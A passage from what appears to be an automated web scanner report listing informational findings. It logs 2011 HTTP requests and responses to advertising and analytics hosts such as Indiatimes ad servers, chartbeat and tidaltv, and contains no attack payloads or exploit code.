Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=cG8IvxHEQGZ7AAQ%2FKkpAKSZQ4bf6EKUegVRojKanLLDe9BVikgcl25tE9iMUzjWnqqMEeqhlz5IdBuUB0MK3B%2FsCMFl%2FfNWhi7CI%2F8jSGRqObm%2FaKwWALRMUAI9drq1rn0ihQUhkYZ0eDBEzTt7rKZZanJWuK%2BsXfErkfA%3D%3D; MMNATTR=6%2Fsptoq4rcqn54lAbIk8LF%2Fw6jXKmlMTnkNsgMEYFzXA9gs%2BC4SMYjcD%2BAGjscVN9gzYKdEkAFwmYicReq5BMRRMpDZDghdUJfcY7cPB5ggAfafqpXCAYwIBp4vEBzDQiijQMpZNuE6Q83ST6zbLFZuFnGP6YgJAWTddEEguv72RhOtelqeiIK9HUXc8ysbiPgi%2BZY6BA8PDPTuwS%2F4kl3GxtOqDY%2BoqCYfu7oIYgZJKAw9avIJ0bnoHjFfW7D96n20aoNZnj7aEqIydyS7GWNzKKjsxnDfQoLiuPSGJLP5fTc%2FW7N2CE5UbmCbv3UeE7P4ie09b1uxpnb0BUZtJP2xPYGr7f9B79LtMJrS7AeUHdU%2B%2BaULygIHL0fTQS2pFF9TCgiCz8u%2BD; MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; MMNSESSIDC=2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=3; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:28:14 GMT
Vary: Accept-Encoding
Content-Length: 1322
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farti
...[SNIP]...

29.50. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Request

GET /ads.dll/getad?slotid=37608 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:25:41 GMT
Content-Type: text/html
Content-Length: 402

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0"><a href="http://netspiderads2.indiatimes.com/ads.dll/cl
...[SNIP]...

29.51. http://netspiderads2.indiatimes.com/ads.dll/getxmlad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getxmlad

Request

GET /ads.dll/getxmlad?slotid=36287&rettype=1 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:59:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 08:29:35 GMT
Expires: Mon, 08 Dec 2008 02:59:35 GMT
Content-Type: text/html
Content-Length: 199

document.write('<script tagid="bf0cc1c2f091a8d9d248bd91c646fdfe" src="' + "http://amconf.videoegg.com/tagconf/current/bf0cc1c2f091a8d9d248bd91c646fdfe/config.js?" + Math.random() + '"></s'+'cript>');

29.52. http://netspiderads2.indiatimes.com/ads.dll/photoserv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/photoserv

Request

GET /ads.dll/photoserv HTTP/1.1
Host: netspiderads2.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 04:16:06 GMT
Content-Type: text/html
Content-Length: 105

<html><head><title>No Active Image Found.</title></head><body><!--No Active Image Found.--></body></html>

29.53. http://netspiderads3.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads3.indiatimes.com
Path:   /ads.dll/getad

Request

GET /ads.dll/getad?slotid=542 HTTP/1.1
Host: netspiderads3.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:35:22 GMT
Content-Type: text/html
Content-Length: 398

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0"><a href="http://netspiderads3.indiatimes.com/ads.dll/cl
...[SNIP]...

29.54. http://netspiderads3.indiatimes.com/ads.dll/photoserv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads3.indiatimes.com
Path:   /ads.dll/photoserv

Request

GET /ads.dll/photoserv HTTP/1.1
Host: netspiderads3.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:16:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 04:16:12 GMT
Content-Type: text/html
Content-Length: 105

<html><head><title>No Active Image Found.</title></head><body><!--No Active Image Found.--></body></html>

29.55. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Sun, 04 Sep 2011 02:27:38 GMT
Expires: Sun, 04 Sep 2011 02:27:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

29.56. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sun, 04 Sep 2011 02:27:36 GMT
Expires: Sun, 04 Sep 2011 02:27:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

29.57. http://ping.chartbeat.net/ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.chartbeat.net
Path:   /ping

Request

GET /ping?h=social.ndtv.com&p=%2Fstatic%2FComment%2FForm%2F%3F%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142&u=efl9lo3odsxv1y4d&d=social.ndtv.com&g=2494&n=0&c=0&x=0&y=321&w=250&j=45&R=0&W=0&I=1&r=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&b=6468&t=nvw4a2nuo8myc0ij&i=NDTV%20Social%3A%20Comment%20Form&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 503 Site over allowed capacity.
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:25:59 GMT
Content-Type: text/html
Connection: close
Content-Length: 150

<HTML><HEAD>
<TITLE>503 Site over allowed capacity.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

29.58. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=ur1&category=kindle&banner=0FYSGBRNTHMCPW1BX682&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:11 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 1270
Cneonction: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <map name="boxmap"> <area shape="rect" coords="638,78,728,
...[SNIP]...

29.59. http://tidaltv.com/aboutus_who.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /aboutus_who.html

Request

GET /aboutus_who.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/publisher_overview.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.2.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 5439
Content-Type: text/html
Last-Modified: Sun, 21 Aug 2011 23:45:58 GMT
Accept-Ranges: bytes
ETag: "e9c1f7a5c60cc1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://ww
...[SNIP]...

29.60. http://tidaltv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: tidaltv.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:09 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.61. http://tidaltv.com/optoutconfirm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /optoutconfirm.html

Request

GET /optoutconfirm.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/PrivacyDashboard.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmb=243159559.5.10.1315133926; __utmc=243159559; opt-out=true

Response

HTTP/1.1 200 OK
Content-Length: 5447
Content-Type: text/html
Last-Modified: Thu, 19 May 2011 15:17:28 GMT
Accept-Ranges: bytes
ETag: "e1ed75dd3716cc1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:53 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://w
...[SNIP]...

29.62. http://tidaltv.com/publisher_overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /publisher_overview.html

Request

GET /publisher_overview.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.1.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 24612
Content-Type: text/html
Last-Modified: Thu, 23 Sep 2010 19:05:29 GMT
Accept-Ranges: bytes
ETag: "32aea4a525bcb1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://www
...[SNIP]...

29.63. http://tidaltv.com/technology_overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /technology_overview.html

Request

GET /technology_overview.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/aboutus_who.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.3.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 6684
Content-Type: text/html
Last-Modified: Thu, 23 Sep 2010 19:05:29 GMT
Accept-Ranges: bytes
ETag: "32aea4a525bcb1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://w
...[SNIP]...

29.64. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/TOI_mumbai_articlelist_36950_TOP.html

Request

GET /configspace/ads/TOI_mumbai_articlelist_36950_TOP.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "35812a3d66f854bf3b6ff8733424d093:1301465551"
Last-Modified: Wed, 30 Mar 2011 06:12:31 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 3108
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:34:02 GMT
Connection: close

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0" STYLE="background-color:transparent"><style type="text/
...[SNIP]...

29.65. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleadsarticlelistbot.html

Request

GET /configspace/ads/googleadsarticlelistbot.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6a90eddd8a6b5d24047960c5c457324b:1305721704"
Last-Modified: Wed, 18 May 2011 12:28:23 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2955
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:34:06 GMT
Connection: close

<style type="text/css">
<!--
a{text-decoration:none}
a:hover{text-decoration: underline}
-->
</style> <script language="JavaScript">
try{
var it_showhide=[1,1,1]; //Title,Description,URL
var it_title
...[SNIP]...

29.66. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleshowbtm.html

Request

GET /configspace/ads/googleshowbtm.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

